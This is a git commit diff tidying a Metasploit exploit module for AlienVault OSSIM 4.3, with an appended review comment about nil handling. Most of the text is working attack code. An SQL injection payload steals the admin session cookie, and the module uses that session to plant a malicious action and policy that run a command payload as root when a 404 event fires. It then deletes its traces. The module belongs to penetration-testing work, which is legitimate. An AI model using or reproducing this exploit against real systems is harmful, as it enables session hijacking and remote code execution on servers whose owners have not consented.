Do module clean up

bug/bundler_fix
jvazquez-r7 2014-04-28 11:45:40 -05:00
parent 2e04bc9e4e
commit 245b591247
1 changed files with 92 additions and 90 deletions


@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['OSVDB', '106252'],
['EDB', '33006']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => ['unix'],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Targets' =>
[
['Alienvault OSSIM', {}]
['Alienvault OSSIM 4.3', {}]
],
'Privileged' => true,
'DisclosureDate' => "Apr 28 2014",
'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0))
register_options(
@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# Check version
vprint_status("#{peer} - Trying to detect vulnerable OSSIM")
marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4))
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1
if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable
else
print_status("#{res.body}")
return Exploit::CheckCode::Safe
end
@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4))
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}"
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
print_status("#{peer} - Trying to grab admin session through SQLi")
@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_get' => { 'date_from' => sqli }
})
if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/
adminsession = $1
@cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*")
if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
admin_session = $1
@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
else
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200
if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
end
# Retrieving the Action ID, used to clean up the action after succesful exploitation
post_vars = "page=1&rp=2000"
# Retrieving the Action ID, used to clean up the action after successful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie,
'data' => post_vars
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/
@actionid = $1
print_status("#{peer} - Action ID is [ #{@actionid} ]")
if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@action_id = $1
print_status("#{peer} - Action ID is [ #{@action_id} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
end
@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"),
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie,
'vars_get' => {
'm_opt' => 'configuration',
@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/
policyctx = $1
policygroup = $2
print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!")
if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
end
@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policygroup,
'ctx' => policyctx,
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY
@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => @actionid,
'actions[]' => @action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200
if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]")
else
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'ctx' => policyctx,
'group' => policygroup
'ctx' => policy_ctx,
'group' => policy_group
},
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/
@policyid = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!")
if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policy_id = $1
print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
end
# Reload the policies to make our new policy active
policy = rand_text_alpha(8)
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dontexist = rand_text_alpha(8+rand(4))
dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dontexist),
'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie
})
if res and res.code == 404
if res && res.code == 404
print_status("#{peer} - Payload delivered")
else
fail_with(Failure::Unknown, "#{peer} - Payload failed!")
@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote
def cleanup
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }
})
begin
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }
})
if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
print_warning("#{peer} - Unable to retrieve token")
if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
print_warning("#{peer} - Unable to retrieve token")
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token
}
})
if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,
}
})
if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
ensure
super # mixins should be able to cleanup even in case of Exception
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policyid,
'token' => token
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @actionid,
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Action ID [ #{@actionid} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
end
end
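Review bot: The else branch of `check` dereferences `res` after the condition has already admitted nil: the new test `res && res.code == 200 && res.body =~ ...` falls through to `print_status("#{res.body}")` when no response came back, which raises NoMethodError instead of returning CheckCode::Safe, and when a response did come back it prints the entire page body at normal verbosity. A safer line is `vprint_status(res.body) if res`. The same nil-tolerance gap is in `cleanup`: `token` stays nil when the token request fails (only a warning is printed) and `@policy_id`/`@action_id` are nil when `exploit` aborted before creating them, yet the deletepolicy.php and deleteaction.php requests are still sent with those nil values; wrapping the two removal requests in `if token && @policy_id` and `if @action_id` respectively would skip the no-op calls. `check`'s body continues outside its hunk.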